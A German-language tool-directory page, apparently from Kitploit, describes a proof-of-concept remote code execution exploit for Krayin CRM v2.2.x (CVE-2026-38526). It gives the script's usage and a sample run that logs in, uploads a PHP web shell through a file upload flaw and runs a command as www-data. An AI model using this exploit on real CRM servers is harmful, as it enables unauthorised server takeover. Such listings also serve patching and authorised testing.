Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-38526-KrayinCRM-RCE — CVE-2026-38526 Exploit | von infrar3d | Kitploit
Tools/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

CVE-2026-38526 Exploit | von infrar3d

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
1vor 1 MonatNoch nicht geprüft
Teilen

CVE-2026-38526 - Krayin CRM RCE

exploitet von infrar3d

Dies ist ein Proof-of-Concept für Remote Code Execution (RCE), der speziell für Krayin CRM v2.2.x entwickelt wurde, ein Open-Source-Customer-Relationship-Management-System. Das Skript automatisiert die Ausnutzung einer Datei-Upload-Schwachstelle in der administrativen Oberfläche des CRM, um die Remote-Ausführung von Befehlen auf dem Zielserver zu erreichen.

Verwendung:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

Beispiel:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

Dieses Skript lädt standardmäßig eine PHP-cmd-Shell von revshells.com hoch.

Nach der Ausnutzung kannst du die Shell in deinem Browser öffnen und von der Webseite aus Befehle senden.

⚠️ Haftungsausschluss ⚠️

Diese Software und der Proof-of-Concept-Code werden nur für Bildungs- und Forschungszwecke bereitgestellt.

  • Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
  • Nicht gegen Systeme ohne ausdrückliche vorherige Genehmigung verwenden.
  • Die Verwendung dieser Tools für Angriffe auf Ziele ohne Einwilligung ist illegal.

Du bist dafür verantwortlich, alle anwendbaren Gesetze einzuhalten. Nutze es ethisch und verantwortungsbewusst.

Tool herunterladen